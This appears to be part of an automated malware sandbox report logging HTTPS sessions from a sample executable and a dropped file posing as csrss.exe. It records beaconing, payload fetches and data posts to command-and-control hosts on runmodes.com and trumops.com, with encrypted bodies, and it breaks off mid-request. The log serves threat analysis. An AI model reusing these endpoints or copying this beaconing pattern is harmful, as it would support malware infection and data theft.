                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  11192.168.2.349765104.21.79.9443C:\Windows\rss\csrss.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:13:28 UTC32OUTGET /api/cdn?c=fa2e76e6e1aa03da&uuid=442b90d2-fde4-485f-a003-6086e2191d6e HTTP/1.1
                                                                                                  Host: server2.trumops.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:13:28 UTC32INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:13:28 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.0.11
                                                                                                  access-control-allow-credentials: false
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Cb6DsoWCWiiMSOtk2eA8Vp0Py8GdHuGv3rMUrU7MySWZ3WtgyoA%2Fp01iNlFKlkyrhKRSZHKrT7VPJ03VXNSrWk1hiuVU7gIp7ynyfWhNXu82cofMcBQmGjijbcqIBhSsffYLY%2Bw3"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc1afd9e77025-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                  2021-11-04 12:13:28 UTC32INData Raw: 31 33 34 0d 0a 70 39 6c 4f 4c 4f 2b 37 7a 62 42 66 4e 64 61 5a 33 78 42 39 36 51 71 32 51 39 2f 35 59 30 6c 6c 56 45 39 69 58 46 6f 63 50 6e 71 72 34 47 74 59 73 61 71 79 72 6d 79 71 2b 57 36 2f 76 49 46 66 64 4e 47 30 6c 57 77 52 2f 38 55 57 6e 38 38 38 43 49 6b 39 69 61 62 41 31 67 59 6c 37 31 45 58 41 6c 36 48 52 69 51 71 66 5a 4b 37 48 34 46 7a 64 55 78 31 75 4c 4d 4f 64 6a 66 64 63 4b 70 68 67 61 7a 42 7a 59 73 58 30 43 6c 38 53 47 66 53 46 30 5a 6e 57 64 31 72 39 38 72 2f 73 5a 33 48 4c 6d 33 43 70 31 2f 6c 65 51 2f 65 34 78 55 7a 6c 38 57 2f 52 75 35 33 51 45 45 30 69 70 6d 56 37 69 32 6c 76 54 72 75 44 54 72 45 64 7a 79 58 77 68 67 37 65 61 62 38 47 54 55 32 78 59 72 4e 4d 74 68 64 75 30 48 75 6d 63 6c 76 4a 54 46 2b 52 51 62 56 52 76 4d 32 63 63
                                                                                                  Data Ascii: 134p9lOLO+7zbBfNdaZ3xB96Qq2Q9/5Y0llVE9iXFocPnqr4GtYsaqyrmyq+W6/vIFfdNG0lWwR/8UWn888CIk9iabA1gYl71EXAl6HRiQqfZK7H4FzdUx1uLMOdjfdcKphgazBzYsX0Cl8SGfSF0ZnWd1r98r/sZ3HLm3Cp1/leQ/e4xUzl8W/Ru53QEE0ipmV7i2lvTruDTrEdzyXwhg7eab8GTU2xYrNMthdu0HumclvJTF+RQbVRvM2cc
                                                                                                  2021-11-04 12:13:28 UTC33INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  12192.168.2.349802172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:13:38 UTC33OUTPOST /api/log HTTP/1.1
                                                                                                  Host: runmodes.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Content-Length: 160
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:13:38 UTC33OUTData Raw: 30 4c 58 58 58 6f 2f 45 75 77 6b 41 68 7a 59 49 44 50 48 2f 34 6b 79 47 36 75 78 4c 58 6d 59 7a 2f 67 76 65 42 78 4f 49 79 5a 47 75 74 57 65 47 6a 77 50 78 4c 31 35 5a 52 70 66 6d 6d 71 32 65 64 34 54 67 66 44 58 56 6e 2f 54 47 66 70 4d 7a 67 76 48 72 68 63 48 38 39 6e 78 4e 36 4c 78 46 4c 30 76 67 64 30 30 53 6d 63 43 77 48 6a 30 57 5a 75 7a 6d 66 2f 46 63 78 30 62 36 68 2f 37 66 34 68 63 55 57 6e 41 2b 4a 51 6b 2b 4b 64 38 37 41 50 69 38 68 62 44 52 4f 73 57 4e 76 67 3d 3d
                                                                                                  Data Ascii: 0LXXXo/EuwkAhzYIDPH/4kyG6uxLXmYz/gveBxOIyZGutWeGjwPxL15ZRpfmmq2ed4TgfDXVn/TGfpMzgvHrhcH89nxN6LxFL0vgd00SmcCwHj0WZuzmf/Fcx0b6h/7f4hcUWnA+JQk+Kd87APi8hbDROsWNvg==
                                                                                                  2021-11-04 12:13:38 UTC33INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:13:38 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K%2FmANzxG6cuJJZvrreMH2tJE24bTsZtpqmU7WLMUj5jxJo7IDOe90xKNFg6hpCsC%2F%2FRFL13fJ5BXvlYEp6OS%2FTzDY5%2FI48xqkw24cx60Jk%2BK5lEtBxQOrjF9VRkORKQ%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc1e8ccd16909-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  13192.168.2.349831104.21.79.9443C:\Windows\rss\csrss.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:14:04 UTC34OUTPOST /api/poll HTTP/1.1
                                                                                                  Host: server2.trumops.com
                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.116 Safari/537.36
                                                                                                  Content-Length: 660
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:14:04 UTC34OUTData Raw: 64 53 62 79 41 2f 6c 62 55 4a 35 64 4c 55 33 6a 45 49 2f 4f 6d 6e 30 5a 6b 47 38 51 67 48 65 7a 31 36 47 56 59 76 46 6e 4d 52 72 68 4b 2f 45 4e 38 34 73 44 31 4f 50 48 58 57 76 75 47 63 47 6d 4f 52 47 68 41 37 2b 62 79 45 70 65 38 71 55 78 4f 4a 35 67 46 6e 48 41 59 70 4b 2f 36 62 2f 74 6d 34 59 71 4a 45 76 33 31 59 78 5a 70 4e 53 76 50 36 30 62 77 2b 42 66 7a 69 70 31 4f 4c 30 56 59 6d 4a 31 46 43 57 71 31 52 37 6e 59 31 54 50 4a 79 76 31 56 75 62 67 63 65 50 54 75 69 47 6b 49 30 38 6a 72 4e 70 51 50 4f 48 6d 49 4d 39 65 54 52 4a 77 7a 30 64 2f 57 2b 71 72 4c 75 67 75 34 51 67 59 44 62 49 72 55 6e 49 4d 34 61 4d 39 38 36 4d 64 6e 6d 50 68 4a 49 65 54 50 4c 4e 39 74 4e 2b 67 65 70 30 37 70 72 36 79 69 78 61 50 49 75 55 70 5a 53 6b 78 75 53 35 2f 77 35 50
                                                                                                  Data Ascii: dSbyA/lbUJ5dLU3jEI/Omn0ZkG8QgHez16GVYvFnMRrhK/EN84sD1OPHXWvuGcGmORGhA7+byEpe8qUxOJ5gFnHAYpK/6b/tm4YqJEv31YxZpNSvP60bw+Bfzip1OL0VYmJ1FCWq1R7nY1TPJyv1VubgcePTuiGkI08jrNpQPOHmIM9eTRJwz0d/W+qrLugu4QgYDbIrUnIM4aM986MdnmPhJIeTPLN9tN+gep07pr6yixaPIuUpZSkxuS5/w5P
                                                                                                  2021-11-04 12:14:04 UTC35INHTTP/1.1 404 Not Found
                                                                                                  Date: Thu, 04 Nov 2021 12:14:04 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.0.11
                                                                                                  set-cookie: PHPSESSID=cnlc3ums43ob7amk913qjg230o; path=/; HttpOnly
                                                                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  cache-control: no-store, no-cache, must-revalidate
                                                                                                  pragma: no-cache
                                                                                                  access-control-allow-credentials: false
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=K8%2BWwHFzEcC65SRlptMAbLk1ZeMBaUi3xsBQMNzzlQjB5u4QmzHcBSCpMW4bK08piNRaXwWPyWEKl2fynOjutLpjH0glYZ3e22rPHrf252BU1FX1nS%2Bm8MaGSw3sfE8O7dW6RE8S"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc28c88274a67-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                  2021-11-04 12:14:04 UTC36INData Raw: 65 38 0d 0a 51 78 30 64 54 46 69 34 71 4d 73 64 45 4f 64 2f 63 6d 47 64 5a 6e 61 6b 51 76 67 68 6e 2f 38 54 49 45 56 44 41 36 6f 44 30 39 52 61 41 71 77 6f 34 32 6f 4e 55 68 30 66 53 4f 76 75 42 65 78 4c 4a 53 57 4f 4e 6d 47 58 54 4b 77 4f 48 34 6a 35 6d 6c 6d 59 65 42 75 31 53 70 57 56 56 44 4b 70 65 77 4a 6c 73 48 38 45 68 78 62 51 43 59 6b 49 7a 66 62 68 63 54 68 38 47 51 48 48 76 68 6d 49 55 2f 4c 35 67 75 53 37 62 5a 64 31 31 69 6b 42 36 77 68 4d 4e 74 67 56 50 79 68 55 57 53 51 6a 46 75 39 36 43 78 48 6a 75 70 57 41 30 72 35 44 33 42 65 44 6e 70 5a 6d 45 4b 4f 4e 44 6d 4d 49 59 47 66 62 55 36 2b 48 59 66 79 44 6c 6d 6a 4f 4b 6a 4d 78 49 65 38 52 57 77 6b 4a 43 6d 61 42 59 45 4b 62 73 51 3d 3d 0d 0a
                                                                                                  Data Ascii: e8Qx0dTFi4qMsdEOd/cmGdZnakQvghn/8TIEVDA6oD09RaAqwo42oNUh0fSOvuBexLJSWONmGXTKwOH4j5mlmYeBu1SpWVVDKpewJlsH8EhxbQCYkIzfbhcTh8GQHHvhmIU/L5guS7bZd11ikB6whMNtgVPyhUWSQjFu96CxHjupWA0r5D3BeDnpZmEKONDmMIYGfbU6+HYfyDlmjOKjMxIe8RWwkJCmaBYEKbsQ==
                                                                                                  2021-11-04 12:14:04 UTC36INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.2.349751172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:12:36 UTC2OUTPOST /api/log HTTP/1.1
                                                                                                  Host: runmodes.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Content-Length: 184
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:12:36 UTC2OUTData Raw: 36 55 44 43 43 39 54 2b 58 47 5a 36 42 69 70 6d 75 4f 48 43 32 6e 4f 37 70 65 2f 4c 73 2f 2b 47 79 35 72 41 30 35 67 42 66 77 53 53 4c 64 4f 64 6b 54 48 62 79 59 6e 77 43 50 41 39 2f 35 4d 41 73 51 4e 59 32 49 57 7a 52 73 44 79 54 34 32 54 37 76 4d 47 6d 71 59 75 73 71 56 78 41 4c 65 47 63 7a 6c 56 45 37 2b 73 36 4e 37 41 37 6b 32 6e 31 61 43 79 4a 75 30 30 65 53 4c 44 38 65 6b 42 6e 71 61 41 45 37 49 4d 47 58 36 64 6d 32 6e 35 65 36 57 52 41 4e 4a 73 71 2f 45 65 77 6c 6f 48 43 59 6a 56 4e 43 4a 59 4d 5a 72 44 52 47 49 54 77 49 4c 55 42 77 3d 3d
                                                                                                  Data Ascii: 6UDCC9T+XGZ6BipmuOHC2nO7pe/Ls/+Gy5rA05gBfwSSLdOdkTHbyYnwCPA9/5MAsQNY2IWzRsDyT42T7vMGmqYusqVxALeGczlVE7+s6N7A7k2n1aCyJu00eSLD8ekBnqaAE7IMGX6dm2n5e6WRANJsq/EewloHCYjVNCJYMZrDRGITwILUBw==
                                                                                                  2021-11-04 12:12:36 UTC2INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:12:36 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=LpViToLIrj5PhFrwqy%2FjaoP7MlNxERPOobbLIiyFXoqU66%2FydePwuqkUnoM53d%2BY4%2FvabdQxQZFn9sb%2FuEdKH4ml94LucJ%2BI8kcCISpV%2Fh7iOhc703RLpIBc4Zuh6Ao%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc06add270610-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  3192.168.2.349752172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:12:37 UTC3OUTPOST /api/log HTTP/1.1
                                                                                                  Host: runmodes.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Content-Length: 184
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:12:37 UTC3OUTData Raw: 66 34 36 6d 63 47 63 47 78 38 61 6e 47 63 75 43 4b 6b 37 58 2b 74 77 45 75 72 6b 53 41 47 2f 66 7a 48 69 4d 48 4d 45 69 35 64 2f 42 62 55 4f 43 34 36 4f 4e 47 72 45 42 38 44 76 68 76 48 6d 59 71 7a 34 2b 4f 4e 6a 4f 31 30 53 50 6f 68 62 35 49 77 76 7a 41 63 4a 69 78 71 47 6d 36 6f 7a 55 71 63 6a 50 4e 76 30 48 49 67 76 45 47 61 74 42 57 61 30 6b 38 4d 65 75 42 46 70 74 67 4a 2b 66 6c 59 31 41 74 33 65 6e 30 75 33 77 79 30 74 64 47 69 6a 55 4d 6e 78 4e 47 49 58 31 57 49 48 58 69 59 42 56 70 72 63 62 4b 67 33 56 69 74 4d 67 6f 53 71 5a 65 45 5a 53
                                                                                                  Data Ascii: f46mcGcGx8anGcuCKk7X+twEurkSAG/fzHiMHMEi5d/BbUOC46ONGrEB8DvhvHmYqz4+ONjO10SPohb5IwvzAcJixqGm6ozUqcjPNv0HIgvEGatBWa0k8MeuBFptgJ+flY1At3en0u3wy0tdGijUMnxNGIX1WIHXiYBVprcbKg3VitMgoSqZeEZS
                                                                                                  2021-11-04 12:12:37 UTC3INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:12:37 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=skJ3EUIWr64bn2ZBpZB%2FUza5IcFcVK1GnoBGeZNVUNw6tAqiu3w0RD2i%2FVOEjtqhdUYauXODe2vSW3VkEebSi5J4RBuav3d05zXPONiDRgl7VLx6Y2xknNK7ktHpo1Y%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc06bbf024e7f-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  4192.168.2.349753172.67.139.144443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:12:37 UTC4OUTGET /api/cdn?c=dfd675dbadcd07bb&kind=main&uuid= HTTP/1.1
                                                                                                  Host: server16.trumops.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:12:38 UTC4INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:12:38 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.0.11
                                                                                                  access-control-allow-credentials: false
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Y4yBcOTEnqgeuKRPTB%2BXi9MTvSPQYqR4IPUIF6pEKxoNuwSJEedzbMGrA3JRmf6McQdWBMeHTdLzGgtfMNGs9Mb0SSQidBJFIGoeQhX3%2BEbW8eGmrizD5bHo%2BE9MF0mfQmiLZKblkQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc06d9abd74ed-LHR
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                  2021-11-04 12:12:38 UTC5INData Raw: 31 33 34 0d 0a 35 6a 4b 35 32 44 7a 36 59 4f 36 71 61 79 67 73 59 69 45 43 6d 6a 46 53 38 37 50 6a 52 38 4b 74 55 56 56 63 58 76 55 34 6e 4c 36 4e 39 62 6f 78 38 31 39 36 47 35 44 41 36 72 36 64 4d 4b 36 41 34 53 76 63 39 43 37 5a 31 36 38 74 73 50 57 32 50 68 36 69 69 4d 70 44 74 4b 73 32 64 79 74 41 43 57 79 57 7a 74 6f 78 51 38 2f 63 59 37 52 46 38 34 53 57 39 57 64 45 64 34 51 71 74 31 77 52 70 4a 73 78 79 4d 44 65 72 48 4d 67 44 4d 53 52 39 79 70 71 37 48 72 4b 32 63 48 5a 7a 63 4f 48 42 45 57 6b 54 33 77 69 6e 31 50 43 6c 6f 72 58 69 78 42 5a 50 54 31 50 31 59 61 32 4e 51 5a 6c 6f 70 46 77 77 68 79 42 4f 66 6a 59 52 62 2b 55 46 50 44 4f 4d 6b 62 33 58 33 39 37 76 66 4c 59 64 4f 35 67 71 6e 4e 72 42 32 68 4c 35 37 31 7a 6b 2b 2f 52 6c 69 6a 73 6c 6b
                                                                                                  Data Ascii: 1345jK52Dz6YO6qaygsYiECmjFS87PjR8KtUVVcXvU4nL6N9box8196G5DA6r6dMK6A4Svc9C7Z168tsPW2Ph6iiMpDtKs2dytACWyWztoxQ8/cY7RF84SW9WdEd4Qqt1wRpJsxyMDerHMgDMSR9ypq7HrK2cHZzcOHBEWkT3win1PClorXixBZPT1P1Ya2NQZlopFwwhyBOfjYRb+UFPDOMkb3X397vfLYdO5gqnNrB2hL571zk+/Rlijslk
                                                                                                  2021-11-04 12:12:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  5192.168.2.349755172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:12:40 UTC5OUTPOST /api/log HTTP/1.1
                                                                                                  Host: runmodes.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Content-Length: 172
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:12:40 UTC5OUTData Raw: 74 36 31 4a 4b 75 2b 74 57 51 61 52 7a 63 6b 4a 69 7a 5a 77 72 42 31 58 49 31 69 58 47 45 43 43 34 62 48 33 54 74 57 52 39 69 32 69 72 37 55 72 65 4b 6c 55 66 59 69 4a 48 2b 64 7a 6d 76 79 32 71 65 61 4b 33 6a 52 59 33 4b 45 33 55 6f 34 43 57 4b 2b 51 75 52 53 58 45 72 49 55 6b 2b 4d 78 45 6a 33 65 44 4a 66 48 52 64 39 5a 74 54 55 65 70 67 48 43 52 30 78 6d 50 57 32 78 35 38 39 74 71 51 4f 35 7a 34 6d 4c 34 30 47 6a 66 47 72 78 35 4c 67 34 4a 71 35 32 2b 33 6a 36 4a 66 50 35 43 44 36 5a 37 70 76 54 33 46 38 3d
                                                                                                  Data Ascii: t61JKu+tWQaRzckJizZwrB1XI1iXGECC4bH3TtWR9i2ir7UreKlUfYiJH+dzmvy2qeaK3jRY3KE3Uo4CWK+QuRSXErIUk+MxEj3eDJfHRd9ZtTUepgHCR0xmPW2x589tqQO5z4mL40GjfGrx5Lg4Jq52+3j6JfP5CD6Z7pvT3F8=
                                                                                                  2021-11-04 12:12:40 UTC5INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:12:40 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Dun0UjAq3ixcBOnnjd024SseZgFFG6j6dis8sOjYPFrIkjz5js9P3HOVqgMlQHh6peCABhzEaWAn9j%2B6KL9%2FXkyvJVkWTaaAzMTyh4PqmR2MtBPmzly8MgER9Ng9AWY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc07f7afd5b98-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  6192.168.2.349756172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:12:43 UTC6OUTPOST /api/log HTTP/1.1
                                                                                                  Host: runmodes.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Content-Length: 156
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:12:43 UTC6OUTData Raw: 56 79 2f 61 46 44 74 54 31 6c 39 6d 72 39 63 4c 6a 4d 5a 52 31 4b 33 6b 69 6f 33 46 52 47 33 71 36 53 6f 34 44 42 4f 4c 78 73 63 53 56 38 33 70 6e 59 57 62 41 7a 59 4c 33 55 4d 4b 61 79 43 34 64 30 65 50 41 45 67 4b 32 61 51 45 54 70 2b 46 50 48 4c 67 66 30 53 6b 65 44 35 67 59 70 4b 51 7a 70 61 35 55 59 31 49 48 6e 32 37 59 37 4f 63 49 37 2f 50 72 4b 4d 4f 42 4a 6c 39 78 49 34 4e 49 56 59 51 56 63 56 76 4b 41 54 43 30 39 49 63 55 35 31 55 2b 41 4d 33 49 34 64 53
                                                                                                  Data Ascii: Vy/aFDtT1l9mr9cLjMZR1K3kio3FRG3q6So4DBOLxscSV83pnYWbAzYL3UMKayC4d0ePAEgK2aQETp+FPHLgf0SkeD5gYpKQzpa5UY1IHn27Y7OcI7/PrKMOBJl9xI4NIVYQVcVvKATC09IcU51U+AM3I4dS
                                                                                                  2021-11-04 12:12:43 UTC6INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:12:43 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4iuQxDfQ4tFtkJeEfhdWkJJtiCKEolmQLd1nM9OktOuhrmyLlseynRgsZ0dPc%2FcKDg4zKZPpYXw%2BRN5DD%2BEBtEFPRvE5pmI5JEGr6Fb%2Bnwgemk4THQ8WbSPkH63CXRw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc093f86342cf-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  7192.168.2.349759172.67.207.136443C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:13:06 UTC7OUTPOST /api/log HTTP/1.1
                                                                                                  Host: runmodes.com
                                                                                                  User-Agent: Go-http-client/1.1
                                                                                                  Content-Length: 144
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:13:06 UTC7OUTData Raw: 59 4c 6c 32 4d 61 47 66 78 35 48 64 6f 5a 75 68 4d 65 35 2b 42 37 70 76 58 53 6a 34 7a 2b 78 64 5a 4f 73 31 35 48 33 55 2f 41 6b 38 69 67 4d 66 75 6a 55 48 6a 33 56 35 59 31 63 74 38 46 42 7a 46 32 61 2f 4b 6c 73 68 77 41 6c 6b 5a 31 63 6a 77 75 57 61 4c 75 6f 53 46 37 4f 71 78 55 4b 77 44 63 61 74 74 6a 4f 32 4f 34 74 36 32 73 6f 53 79 49 61 42 31 77 57 53 67 5a 41 32 62 4a 66 54 58 39 4a 6f 39 75 61 67 39 64 70 41 70 51 52 35
                                                                                                  Data Ascii: YLl2MaGfx5HdoZuhMe5+B7pvXSj4z+xdZOs15H3U/Ak8igMfujUHj3V5Y1ct8FBzF2a/KlshwAlkZ1cjwuWaLuoSF7OqxUKwDcattjO2O4t62soSyIaB1wWSgZA2bJfTX9Jo9uag9dpApQR5
                                                                                                  2021-11-04 12:13:06 UTC7INHTTP/1.1 200 OK
                                                                                                  Date: Thu, 04 Nov 2021 12:13:06 GMT
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PPyqYirpvXYcS4wMqSEt3f0pKXWnzhko8g8e0wD%2FXh7ehbgyLoU0kPcac1Ldj12x%2BaIVK28BT0unXTygXNiR1YB%2B1Ugm8NNUpr6DI7jIrEjFIp%2FKBHEWKYYihYZew98%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc125cf074e1a-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  8192.168.2.349760104.21.79.9443C:\Windows\rss\csrss.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  2021-11-04 12:13:06 UTC8OUTPOST /bots/post-ia-data?uuid=442b90d2-fde4-485f-a003-6086e2191d6e HTTP/1.1
                                                                                                  Host: server2.trumops.com
                                                                                                  User-Agent: Go-http-client/1.1
